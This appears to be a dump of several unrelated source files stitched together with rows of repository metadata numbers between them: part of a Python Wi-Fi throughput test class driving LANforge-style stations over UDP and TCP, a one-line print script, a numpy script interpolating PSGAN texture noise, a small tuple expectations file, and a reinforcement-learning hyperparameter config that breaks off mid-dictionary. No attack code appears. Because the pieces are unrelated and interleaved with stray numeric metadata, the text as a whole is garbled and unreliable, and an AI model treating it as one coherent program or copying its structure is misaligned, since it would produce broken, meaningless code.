self.key_mgmt = key_mgmt
self.eap = eap
self.identity = identity
self.ttls_passwd = ttls_passwd
self.ttls_realm = ttls_realm
self.domain = domain
self.hessid = hessid
self.dut_bssid = _dut_bssid
self.timeout = 120
self.number_template = number_template
self.debug = _debug_on
self.local_realm = realm.Realm(lfclient_host=self.host, lfclient_port=self.port)
self.station_profile = self.local_realm.new_station_profile()
self.station_profile.lfclient_url = self.lfclient_url
self.station_profile.ssid = self.ssid
self.station_profile.security = self.security
self.station_profile.number_template_ = self.number_template
self.station_profile.mode = 0
#Added to test_ipv4_ttls code
self.upstream_url = None # defer construction
self.sta_url_map = None
self.upstream_resource = None
self.upstream_port = "eth2"
self.station_names = []
if _sta_name is not None:
self.station_names = [_sta_name]
self.localrealm = Realm(lfclient_host=host, lfclient_port=port)
self.resource = _resource
self.cleanup_on_exit = _cleanup_on_exit
self.resulting_stations = {}
self.resulting_endpoints = {}
self.station_profile = None
self.l3_udp_profile = None
self.l3_tcp_profile = None
# def get_realm(self) -> Realm: # py > 3.6
def get_realm(self):
return self.localrealm
def get_station_url(self, sta_name_=None):
if sta_name_ is None:
raise ValueError("get_station_url wants a station name")
if self.sta_url_map is None:
self.sta_url_map = {}
for sta_name in self.station_names:
self.sta_url_map[sta_name] = "port/1/%s/%s" % (self.resource, sta_name)
return self.sta_url_map[sta_name_]
def get_upstream_url(self):
if self.upstream_url is None:
self.upstream_url = "port/1/%s/%s" % (self.upstream_resource, self.upstream_port)
return self.upstream_url
# Compare pre-test values to post-test values
def compare_vals(self, name, postVal, print_pass=False, print_fail=True):
# print(f"Comparing {name}")
if postVal > 0:
self._pass("%s %s" % (name, postVal), print_pass)
else:
self._fail("%s did not report traffic: %s" % (name, postVal), print_fail)
def remove_stations(self):
for name in self.station_names:
LFUtils.removePort(self.resource, name, self.lfclient_url)
def num_associated(self, bssid):
counter = 0
# print("there are %d results" % len(self.station_results))
fields = "_links,port,alias,ip,ap,port+type"
self.station_results = self.localrealm.find_ports_like("eap*", fields, debug_=False)
if (self.station_results is None) or (len(self.station_results) < 1):
self.get_failed_result_list()
for eid,record in self.station_results.items():
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
#pprint(eid)
#pprint(record)
if record["ap"] == bssid:
counter += 1
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
return counter
def clear_test_results(self):
self.resulting_stations = {}
self.resulting_endpoints = {}
super().clear_test_results()
#super(StaConnect, self).clear_test_results().test_results.clear()
def setup(self):
self.clear_test_results()
self.check_connect()
upstream_json = self.json_get("%s?fields=alias,phantom,down,port,ip" % self.get_upstream_url(), debug_=False)
if upstream_json is None:
self._fail(message="Unable to query %s, bye" % self.upstream_port, print_=True)
return False
if upstream_json['interface']['ip'] == "0.0.0.0":
if self.debug:
pprint.pprint(upstream_json)
self._fail("Warning: %s lacks ip address" % self.get_upstream_url(), print_=True)
return False
# remove old stations
print("Removing old stations")
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
response = self.json_get(sta_url)
if (response is not None) and (response["interface"] is not None):
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
LFUtils.wait_until_ports_disappear(self.lfclient_url, self.station_names)
# Create stations and turn dhcp on
self.station_profile = self.localrealm.new_station_profile()
# Build stations
self.station_profile.use_security(self.security, self.ssid, passwd="[BLANK]")
self.station_profile.set_number_template(self.number_template)
print("Creating stations")
self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
self.station_profile.set_command_param("set_port", "report_timer", 1500)
self.station_profile.set_command_flag("set_port", "rpt_timer", 1)
self.station_profile.set_wifi_extra(key_mgmt=self.key_mgmt, eap=self.eap, identity=self.identity,
passwd=self.ttls_passwd,
realm=self.ttls_realm, domain=self.domain,
hessid=self.hessid)
self.station_profile.create(radio=self.radio, sta_names_=self.sta_list, debug=self.debug, use_radius=True, hs20_enable=False)
self._pass("PASS: Station build finished")
def start(self):
if self.station_profile is None:
self._fail("Incorrect setup")
pprint.pprint(self.station_profile)
if self.station_profile.up is None:
self._fail("Incorrect station profile, missing profile.up")
if self.station_profile.up == False:
print("\nBringing ports up...")
data = {"shelf": 1,
"resource": self.resource,
"port": "ALL",
"probe_flags": 1}
self.json_post("/cli-json/nc_show_ports", data)
self.station_profile.admin_up()
LFUtils.waitUntilPortsAdminUp(self.resource, self.lfclient_url, self.station_names)
# station_info = self.jsonGet(self.mgr_url, "%s?fields=port,ip,ap" % (self.getStaUrl()))
duration = 0
maxTime = 100
ip = "0.0.0.0"
ap = ""
print("Waiting for %s stations to associate to AP: " % len(self.station_names), end="")
connected_stations = {}
while (len(connected_stations.keys()) < len(self.station_names)) and (duration < maxTime):
duration += 3
time.sleep(10)
print(".", end="")
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
station_info = self.json_get(sta_url + "?fields=port,ip,ap")
# LFUtils.debug_printer.pprint(station_info)
if (station_info is not None) and ("interface" in station_info):
if "ip" in station_info["interface"]:
ip = station_info["interface"]["ip"]
if "ap" in station_info["interface"]:
ap = station_info["interface"]["ap"]
if (ap == "Not-Associated") or (ap == ""):
if self.debug:
print(" -%s," % sta_name, end="")
else:
if ip == "0.0.0.0":
if self.debug:
print(" %s (0.0.0.0)" % sta_name, end="")
else:
connected_stations[sta_name] = sta_url
data = {
"shelf":1,
"resource": self.resource,
"port": "ALL",
"probe_flags": 1
}
self.json_post("/cli-json/nc_show_ports", data)
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
station_info = self.json_get(sta_url) # + "?fields=port,ip,ap")
if station_info is None:
print("unable to query %s" % sta_url)
self.resulting_stations[sta_url] = station_info
ap = station_info["interface"]["ap"]
ip = station_info["interface"]["ip"]
if (ap != "") and (ap != "Not-Associated"):
print(" %s +AP %s, " % (sta_name, ap), end="")
if self.dut_bssid != "":
if self.dut_bssid.lower() == ap.lower():
self._pass(sta_name+" connected to BSSID: " + ap)
# self.test_results.append("PASSED: )
# print("PASSED: Connected to BSSID: "+ap)
else:
self._fail("%s connected to wrong BSSID, requested: %s Actual: %s" % (sta_name, self.dut_bssid, ap))
else:
self._fail(sta_name+" did not connect to AP")
return False
if ip == "0.0.0.0":
self._fail("%s did not get an ip. Ending test" % sta_name)
else:
self._pass("%s connected to AP: %s With IP: %s" % (sta_name, ap, ip))
if self.passes() == False:
if self.cleanup_on_exit:
print("Cleaning up...")
self.remove_stations()
return False
def udp_profile(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu):
# Create UDP endpoint - Alex's code!
self.l3_udp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_udp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_udp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_udp_tput_profile.side_a_min_pdu = side_a_min_pdu
self.l3_udp_tput_profile.side_b_min_pdu = side_b_min_pdu
self.l3_udp_tput_profile.report_timer = 1000
self.l3_udp_tput_profile.name_prefix = "udp"
self.l3_udp_tput_profile.create(endp_type="lf_udp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
def tcp_profile(self, side_a_min_bps, side_b_min_bps):
# Create TCP endpoints - original code!
self.l3_tcp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_tcp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_tcp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_tcp_tput_profile.name_prefix = "tcp"
self.l3_tcp_tput_profile.report_timer = 1000
self.l3_tcp_tput_profile.create(endp_type="lf_tcp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
# Start UDP Downstream Traffic
def udp_throughput(self):
print("\nStarting UDP Traffic")
self.l3_udp_tput_profile.start_cx()
time.sleep(1)
self.l3_udp_tput_profile.refresh_cx()
def tcp_throughput(self):
print("\nStarting TCP Traffic")
self.l3_tcp_tput_profile.start_cx()
time.sleep(1)
self.l3_tcp_tput_profile.refresh_cx()
def udp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_udp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_udp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_udp_tput_profile.created_cx)
# print("\n")
def tcp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_tcp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_tcp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_tcp_tput_profile.created_cx)
# print("\n")
# New Endpoint code to print TX and RX numbers
def collect_client_stats(self, endp_map):
print("Collecting Data")
fields="?fields=name,tx+bytes,rx+bytes"
for (cx_name, endps) in endp_map.items():
try:
endp_url = "/endp/%s%s" % (endps[0], fields)
endp_json = self.json_get(endp_url)
self.resulting_endpoints[endp_url] = endp_json
ptest_a_tx = endp_json['endpoint']['tx bytes']
ptest_a_rx = endp_json['endpoint']['rx bytes']
# ptest = self.json_get("/endp/%s?fields=tx+bytes,rx+bytes" % cx_names[cx_name]["b"])
endp_url = "/endp/%s%s" % (endps[1], fields)
endp_json = self.json_get(endp_url)
self.resulting_endpoints[endp_url] = endp_json
ptest_b_tx = endp_json['endpoint']['tx bytes']
ptest_b_rx = endp_json['endpoint']['rx bytes']
byte_values = []
byte_values.append("Station TX: " + str(ptest_a_tx))
byte_values.append("Station RX: " + str(ptest_a_rx))
byte_values.append("AP TX: " + str(ptest_b_tx))
byte_values.append("AP RX: " + str(ptest_b_rx))
return byte_values
except Exception as e:
self.error(e)
def cleanup_udp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup_tcp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug=self.debug)
def udp_unidirectional(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line):
self.udp_profile(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu)
self.start()
print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
self.udp_throughput()
print("napping %f sec" % self.runtime_secs)
time.sleep(self.runtime_secs)
values = self.udp_stop()
print(values)
# Get value required for measurement
bytes = values[values_line]
# Get value in Bits and convert to Mbps
bits = (int(bytes.split(": ", 1)[1])) * 8
mpbs = round((bits / 1000000) / self.runtime_secs, 2)
return mpbs
def tcp_unidirectional(self, side_a_min_bps, side_b_min_bps, direction, values_line):
self.tcp_profile(side_a_min_bps, side_b_min_bps)
self.start()
print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
self.tcp_throughput()
print("napping %f sec" % self.runtime_secs)
time.sleep(self.runtime_secs)
values = self.tcp_stop()
print(values)
# Get value required for measurement
bytes = values[values_line]
# Get value in Bits and convert to Mbps
bits = (int(bytes.split(": ", 1)[1])) * 8
mpbs = round((bits / 1000000) / self.runtime_secs, 2)
return mpbs
# ~class
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
########################## Test Code ################################
##Main will perform 4 throughput tests on SSID provided by input and return a list with the values
def main(ap_model, firmware, radio, ssid_name, ssid_psk, security, station, runtime):
######## Establish Client Connection #########################
singleClient = SingleClient("10.10.10.201", 8080, debug_=False)
singleClient.sta_mode = 0
singleClient.upstream_resource = 1
singleClient.upstream_port = "eth2"
singleClient.radio = radio
singleClient.resource = 1
singleClient.dut_ssid = ssid_name
singleClient.dut_passwd = ssid_psk
singleClient.dut_security = security
singleClient.station_names = station
singleClient.runtime_secs = runtime
singleClient.cleanup_on_exit = True
#Create List for Throughput Data
tput_data = []
####### Setup UDP Profile and Run Traffic Downstream (AP to STA) #######################
singleClient.setup()
side_a_min_bps = 56000
side_b_min_bps = 500000000
side_a_min_pdu = 1200
side_b_min_pdu = 1500
direction = "Downstream"
values_line = 1 # 1 = Station Rx
try:
udp_ds = singleClient.udp_unidirectional(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line)
print("UDP Downstream:", udp_ds, "Mbps")
tput_data.append("UDP Downstream: " + str(udp_ds))
except:
udp_ds = "error"
print("UDP Downstream Test Error")
tput_data.append("UDP Downstream: Error")
####### Setup UDP Profile and Run Traffic Upstream (STA to AP) #######################
#singleClient.setup()
side_a_min_bps = 500000000
side_b_min_bps = 0
side_a_min_pdu = 1200
side_b_min_pdu = 1500
direction = "Upstream"
values_line = 3 # 3 = AP Rx
try:
udp_us = singleClient.udp_unidirectional(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line)
print("UDP Upstream:",udp_us,"Mbps")
tput_data.append("UDP Upstream: " + str(udp_us))
except:
udp_us = "error"
print("UDP Upstream Test Error")
tput_data.append("UDP Upstream: Error")
#Cleanup UDP Endpoints
#singleClient.cleanup_udp()
####### Setup TCP Profile and Run Traffic Downstream (AP to STA) #######################
#singleClient.setup()
side_a_min_bps = 0
side_b_min_bps = 500000000
direction = "Downstream"
values_line = 1 # 1 = Station Rx
try:
tcp_ds = singleClient.tcp_unidirectional(side_a_min_bps, side_b_min_bps, direction, values_line)
print("TCP Downstream:",tcp_ds,"Mbps")
tput_data.append("TCP Downstream: " + str(tcp_ds))
except:
tcp_ds = "error"
print("TCP Downstream Test Error")
tput_data.append("TCP Downstream: Error")
####### Setup TCP Profile and Run Traffic Upstream (STA to AP) #######################
#singleClient.setup()
side_a_min_bps = 500000000
side_b_min_bps = 0
direction = "Upstream"
values_line = 3 # 3 = AP Rx
try:
tcp_us = singleClient.tcp_unidirectional(side_a_min_bps, side_b_min_bps, direction, values_line)
print("TCP Upstream:",tcp_us,"Mbps")
tput_data.append("TCP Upstream: " + str(tcp_us))
except:
tcp_us = "error"
print("TCP Upstream Test Error")
tput_data.append("TCP Uptream: Error")
#Cleanup TCP Endpoints
#singleClient.cleanup_tcp()
#Cleanup Endpoints
singleClient.cleanup()
return(tput_data)
def eap_tput(sta_list, ssid_name, radio, security, eap_type, identity, ttls_password):
eap_connect = SingleClientEAP("10.10.10.201", 8080, _debug_on=True)
eap_connect.upstream_resource = 1
eap_connect.upstream_port = "eth2"
eap_connect.security = security
eap_connect.sta_list = sta_list
eap_connect.station_names = sta_list
eap_connect.ssid = ssid_name
eap_connect.radio = radio
eap_connect.eap = eap_type
eap_connect.identity = identity
eap_connect.ttls_passwd = ttls_password
eap_connect.runtime_secs = 10
#Create List for Throughput Data
tput_data = []
####### Setup UDP Profile and Run Traffic Downstream (AP to STA) #######################
eap_connect.setup()
side_a_min_bps = 56000
side_b_min_bps = 500000000
side_a_min_pdu = 1200
side_b_min_pdu = 1500
direction = "Downstream"
values_line = 1 # 1 = Station Rx
try:
udp_ds = eap_connect.udp_unidirectional(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line)
print("UDP Downstream:", udp_ds, "Mbps")
tput_data.append("UDP Downstream: " + str(udp_ds))
except:
udp_ds = "error"
print("UDP Downstream Test Error")
tput_data.append("UDP Downstream: Error")
####### Setup UDP Profile and Run Traffic Upstream (STA to AP) #######################
#singleClient.setup()
side_a_min_bps = 500000000
side_b_min_bps = 0
side_a_min_pdu = 1200
side_b_min_pdu = 1500
direction = "Upstream"
values_line = 3 # 3 = AP Rx
try:
udp_us = eap_connect.udp_unidirectional(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line)
print("UDP Upstream:",udp_us,"Mbps")
tput_data.append("UDP Upstream: " + str(udp_us))
except:
udp_us = "error"
print("UDP Upstream Test Error")
tput_data.append("UDP Upstream: Error")
#Cleanup UDP Endpoints
#singleClient.cleanup_udp()
####### Setup TCP Profile and Run Traffic Downstream (AP to STA) #######################
#singleClient.setup()
side_a_min_bps = 0
side_b_min_bps = 500000000
direction = "Downstream"
values_line = 1 # 1 = Station Rx
try:
tcp_ds = eap_connect.tcp_unidirectional(side_a_min_bps, side_b_min_bps, direction, values_line)
print("TCP Downstream:",tcp_ds,"Mbps")
tput_data.append("TCP Downstream: " + str(tcp_ds))
except:
tcp_ds = "error"
print("TCP Downstream Test Error")
tput_data.append("TCP Downstream: Error")
####### Setup TCP Profile and Run Traffic Upstream (STA to AP) #######################
#singleClient.setup()
side_a_min_bps = 500000000
side_b_min_bps = 0
direction = "Upstream"
values_line = 3 # 3 = AP Rx
try:
tcp_us = eap_connect.tcp_unidirectional(side_a_min_bps, side_b_min_bps, direction, values_line)
print("TCP Upstream:",tcp_us,"Mbps")
tput_data.append("TCP Upstream: " + str(tcp_us))
except:
tcp_us = "error"
print("TCP Upstream Test Error")
tput_data.append("TCP Uptream: Error")
#Cleanup TCP Endpoints
#singleClient.cleanup_tcp()
#Cleanup Endpoints
eap_connect.cleanup()
return(tput_data)
| 42.814639
| 146
| 0.606714
| 5,843
| 45,041
| 4.380455
| 0.06726
| 0.032663
| 0.016878
| 0.015472
| 0.847626
| 0.835671
| 0.82563
| 0.817855
| 0.814026
| 0.810197
| 0
| 0.014511
| 0.280877
| 45,041
| 1,051
| 147
| 42.855376
| 0.775702
| 0.10395
| 0
| 0.818634
| 0
| 0
| 0.093662
| 0.007268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058385
| false
| 0.03354
| 0.012422
| 0.002484
| 0.10559
| 0.101863
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53356027e1e1c532205d963aa9363c18c5588353
| 14
|
py
|
Python
|
code/sample_2-1-15.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | 1
|
2022-03-29T13:50:12.000Z
|
2022-03-29T13:50:12.000Z
|
code/sample_2-1-15.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
code/sample_2-1-15.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
print(9**0.5)
| 7
| 13
| 0.571429
| 4
| 14
| 2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.071429
| 14
| 1
| 14
| 14
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
727601bdf896c3df2c176c804ebc8e67bab24b1e
| 2,345
|
py
|
Python
|
noiseInterp.py
|
oist/psgan
|
2b4faf1cfd1f0ced162a7e44b7d00eb58edf4a49
|
[
"MIT"
] | 1
|
2020-12-24T06:54:40.000Z
|
2020-12-24T06:54:40.000Z
|
noiseInterp.py
|
oist/psgan
|
2b4faf1cfd1f0ced162a7e44b7d00eb58edf4a49
|
[
"MIT"
] | null | null | null |
noiseInterp.py
|
oist/psgan
|
2b4faf1cfd1f0ced162a7e44b7d00eb58edf4a49
|
[
"MIT"
] | 1
|
2020-12-24T06:57:14.000Z
|
2020-12-24T06:57:14.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 12:10:41 2019
@author: reiters
"""
import numpy as np
#t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_501_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_541_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t3=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_507_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t4=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_511_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_rocks1_evaluated/noiseBig_epoch_500_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_rocks1_evaluated/noiseBig_epoch_501_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_crack2_evaluated/best/noiseBig_epoch_512_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_crack2_evaluated/best/noiseBig_epoch_529_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_sand2_evaluated/best/noiseBig_epoch_500_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_sand2_evaluated/best/noiseBig_epoch_529_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
img1Ratio=np.linspace(0,1,11) # for curtain-rocks
#img1Ratio=np.linspace(0.2,0.35,11) # for curtain-crack
#img1Ratio=np.linspace(0.4,.7,11) # for curtain-sand
intNoise=[]
for x in range( len(img1Ratio)):
intNoise.append(img1Ratio[x]*t1 + [1-img1Ratio[x]]*t2)
#np.save('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_crack2_evaluated/best/noiseImage1',intNoise)
#np.save('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_sand2_evaluated/best/noiseImage1',intNoise)
np.save('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_rocks1_evaluated/noiseImage1',intNoise)
| 71.060606
| 174
| 0.826866
| 392
| 2,345
| 4.609694
| 0.209184
| 0.057554
| 0.093525
| 0.129496
| 0.832319
| 0.832319
| 0.832319
| 0.832319
| 0.832319
| 0.831212
| 0
| 0.075165
| 0.029851
| 2,345
| 33
| 175
| 71.060606
| 0.719121
| 0.721109
| 0
| 0
| 0
| 0
| 0.594295
| 0.55626
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72bf157e393cf24cbb2df229c798e4e4c15e63c0
| 202
|
py
|
Python
|
tests/expectations/cat-x-cat-pw-idxs.py
|
Crunch-io/crunch-cube
|
80986d5b2106c774f05176fb6c6a5ea0d840f09d
|
[
"MIT"
] | 3
|
2021-01-22T20:42:31.000Z
|
2021-06-02T17:53:19.000Z
|
tests/expectations/cat-x-cat-pw-idxs.py
|
Crunch-io/crunch-cube
|
80986d5b2106c774f05176fb6c6a5ea0d840f09d
|
[
"MIT"
] | 331
|
2017-11-13T22:41:56.000Z
|
2021-12-02T21:59:43.000Z
|
tests/expectations/cat-x-cat-pw-idxs.py
|
Crunch-io/crunch-cube
|
80986d5b2106c774f05176fb6c6a5ea0d840f09d
|
[
"MIT"
] | 1
|
2021-02-19T02:49:00.000Z
|
2021-02-19T02:49:00.000Z
|
(
((1,), (), ()),
((2,), (), ()),
((1, 2), (), ()),
((), (0,), ()),
((), (0,), (0,)),
((), (), ()),
((), (), ()),
((), (), ()),
((), (), ()),
((), (0,), (0,)),
)
| 15.538462
| 21
| 0.044554
| 9
| 202
| 1
| 0.333333
| 0.888889
| 1
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0.361386
| 202
| 12
| 22
| 16.833333
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72d6db48d214a0b8978ca3f6abcfdd1c8117c2e1
| 6,668
|
py
|
Python
|
config.py
|
hbutsuak95/iv_rl
|
0f72a8f077a238237027ea96b7d1160c35ac9959
|
[
"MIT"
] | 9
|
2022-01-16T11:27:00.000Z
|
2022-03-13T14:04:48.000Z
|
config.py
|
hbutsuak95/iv_rl
|
0f72a8f077a238237027ea96b7d1160c35ac9959
|
[
"MIT"
] | null | null | null |
config.py
|
hbutsuak95/iv_rl
|
0f72a8f077a238237027ea96b7d1160c35ac9959
|
[
"MIT"
] | null | null | null |
config = dict({
"LunarLander-v2": {
"DQN": {
"eff_batch_size" : 128,
"eps_decay" : 0.99,
"gamma" : 0.99,
"tau" : 0.005,
"lr" : 0.0005
},
"EnsembleDQN": {
"eff_batch_size" : 64,
"eps_decay" : 0.99,
"gamma" : 0.99,
"tau" : 0.005,
"lr" : 0.0005
},
"BootstrapDQN":{
"eff_batch_size" : 64,
"eps_decay" : 0.99,
"gamma" : 0.99,
"tau" : 0.005,
"lr" : 0.0005,
"mask" : "bernoulli",
"mask_prob" : 0.9,
"prior_scale" : 10
},
"ProbDQN":{
"eff_batch_size" : 256,
"eps_decay" : 0.991,
"gamma" : 0.99,
"tau" : 0.001,
"lr" : 0.0005,
"loss_att_weight" : 2
},
"IV_EnsembleDQN": {
"eff_batch_size" : 64,
"eps_decay" : 0.99,
"gamma" : 0.99,
"tau" : 0.005,
"lr" : 0.0005,
"dynamic_eps" : True,
"minimal_eff_bs" : 48,
},
"IV_BootstrapDQN":{
"eff_batch_size" : 64,
"eps_decay" : 0.99,
"gamma" : 0.99,
"tau" : 0.005,
"lr" : 0.0005,
"dynamic_eps" : True,
"mask" : "bernoulli",
"mask_prob" : 0.5,
"minimal_eff_bs" : 48,
"prior_scale" : 0.1
},
"IV_ProbEnsembleDQN":{
"eff_batch_size" : 64,
"eps_decay" : 0.99,
"gamma" : 0.99,
"tau" : 0.005,
"lr" : 0.001,
"eps" : 10,
"loss_att_weight" : 3
},
"IV_ProbDQN":{
"eff_batch_size" : 256,
"eps_decay" : 0.991,
"gamma" : 0.99,
"tau" : 0.001,
"lr" : 0.0005,
"loss_att_weight" : 2,
"dynamic_eps" : True,
"minimal_eff_bs" : 208
}
},
"MountainCar-v0":{
"DQN":{
"eff_batch_size" : 256,
"lr" : 0.001,
"eps_decay" : 0.98,
"tau" : 0.01
},
"BootstrapDQN":{
"eff_batch_size" : 256,
"lr" : 0.001,
"eps_decay" : 0.98,
"tau" : 0.05,
"mask_prob" : 0.5,
"prior_scale" : 10
},
"SunriseDQN":{
"eff_batch_size" : 256,
"lr" : 0.001,
"eps_decay" : 0.98,
"tau" : 0.05,
"mask_prob" : 0.5,
"prior_scale" : 10,
"sunrise_temp" : 50
},
"IV_DQN":{
"eff_batch_size" : 256,
"lr" : 0.001,
"eps_decay" : 0.98,
"tau" : 0.05,
"mask_prob" : 0.5,
"prior_scale" : 10,
"eps" : 1000
},
"IV_ProbEnsembleDQN":{
"eff_batch_size" : 256,
"lr" : 0.001,
"eps_decay" : 0.98,
"tau" : 0.05,
"mask_prob" : 0.5,
